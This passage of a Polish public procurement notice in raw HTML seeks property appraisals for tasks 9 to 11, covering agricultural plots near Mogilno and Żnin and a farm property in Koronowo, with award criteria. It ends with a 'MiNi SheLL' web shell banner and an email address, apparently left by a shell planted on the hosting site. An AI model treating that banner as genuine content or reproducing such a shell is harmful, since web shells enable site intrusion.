15. Działka nr 178 o łącznej powierzchni  0,1100 ha, obręb Skotniki, gmina Kruszwica   powiat  Inowrocław. Charakterystyka nieruchomości: działka rolna niezabudowana dla powyższej działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w strefie wiejskiej B- rolniczo- leśnej przestrzeni produkcyjnej  z osadnictwem skoncentrowanym z umiarkowanym rozwojem funkcji produkcyjnych i usługowych.  Położona jest w obszarach wskazanych pod lokalizację elektrowni wiatrowych lecz nie przewiduje się  na niej posadowienia elektrowni wiatrowych. 
Zakres opracowania  15 operatów w dwóch wykonaniach
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie rzeczoznawcy</td><td>20</td></tr><tr><td>aktualizacja operatu w ramach zaoferowanej ceny</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>Zadanie nr 9<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>
Zadanie nr 9
Przedmiotem wyceny jest nieruchomość  położenie nieruchomości:
1. Działka nr 28/5 o łącznej powierzchni  0,2900 ha, obręb Jeziorki, gmina Strzelno,  powiat  Mogilno. Charakterystyka nieruchomości: działka rolna niezabudowana, dla powyższej działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w strefie ,,R,, strefa rolniczej przestrzeni produkcyjnej, tereny rolniczej przestrzeni produkcyjnej niskiej przydatności.  
2. Działka nr 141/1 o łącznej powierzchni 0,7800 ha, obręb Strzelno Kl., gmina Strzelno, powiat  Mogilno. Charakterystyka nieruchomości: działka rolna niezabudowana, dla powyższej działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w strefie M- strefa miejska- obszary działalności inwestycyjnej- potencjalne tereny rozwojowe.
3. Działka nr 13/1 o łącznej powierzchni 1,9300 ha, obręb Mokre, gmina Dąbrowa, powiat  Mogilno. Charakterystyka nieruchomości: działka rolna niezabudowana, dla powyższej działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w terenach gruntów ornych częściowo zabudowanych.
4. Działka nr 75/26 o łącznej powierzchni 1,4913 ha, obręb Parlin, gmina Dąbrowa, powiat  Mogilno. Charakterystyka nieruchomości: działka rolna niezabudowana, dla powyższej działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w terenach gruntów ornych częściowo zabudowanych.
5. Działka nr 61 o łącznej powierzchni 0,5600 ha, obręb Palędzie Dolne, gmina i powiat  Mogilno. Charakterystyka nieruchomości: działka rolna niezabudowana, dla powyższej działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka znajduje się w strefie G- tereny górnicze, na obszarze lasów i zadrzewień i terenie gleb organicznych. W konturze Ls wycena zadrzewień.
Zakres opracowania  5 operatów w dwóch wykonaniach
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie rzeczoznawcy</td><td>20</td></tr><tr><td>aktualizacja operatu w ramach zaoferowanej ceny</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b>Zadanie nr 10<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 10
Przedmiotem wyceny jest nieruchomość  położenie nieruchomości:
1. Działka nr 76/1 o łącznej powierzchni  0,9234 ha, obręb Szelejewo, gmina Gąsawa, powiat  Żnin. Charakterystyka nieruchomości: działka rolna niezabudowana dla powyższej działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy.  W Studium kierunków zagospodarowania przestrzennego gminy działka położona jest obszar RI-1 o  glebach  o wysokim wsk. bonitacji. Przewiduje się na tym obszarze prowadzenie wysokotowarowej gospodarki rolnej. 
2. Działka nr 43 o łącznej powierzchni 5,7800 ha, obręb Godawy, gmina Gąsawa, powiat  Żnin.
Charakterystyka nieruchomości: działka rolna niezabudowana dla powyższej działki nie obowiązuje miejscowy plan zagospodarowania przestrzennego gminy. W Studium kierunków zagospodarowania przestrzennego gminy działka położona jest obszar RI-1 o glebach  o wysokim wsk. bonitacji. Przewiduje się na tym obszarze prowadzenie  wysokotowarowej gospodarki rolnej z preferencją produkcji roślinnej, dopuszcza się  hodowlę trzody i bydła. 
Zakres opracowania  2 operaty w dwóch wykonaniach
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie rzeczoznawcy</td><td>20</td></tr><tr><td>aktualizacja operatu w ramach zaoferowanej ceny</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>11
                  
                <b>Nazwa: </b>Zadanie nr 11<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 11
Nieruchomość nierolna zabudowana o łącznej powierzchni 3,8457 ha, oznaczona jako działki 536/103, 536/104 obręb Mąkowarsko położone na terenie gminy Koronowo, powiat bydgoski
Nieruchomość nierolna, w części zadrzewiona i zakrzaczona, zabudowana budynkami i budowlami między innymi: Obora, Stodoła w podwórzu, cielętnik, magazyny zbożowe, garaże, wiaty, linie elektryczne, drogi place, ogrodzenia. Na nieruchomości znajduje się budynek sklepu, który nie stanowi własności ANR. Studium: tereny rozwojowe, tereny zurbanizowane
Zakres opracowania  1 operat w dwóch wykonaniach
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71319000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>doświadczenie rzeczoznawcy</td><td>20</td></tr><tr><td>aktualizacja operatu w ramach zaoferowanej ceny</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com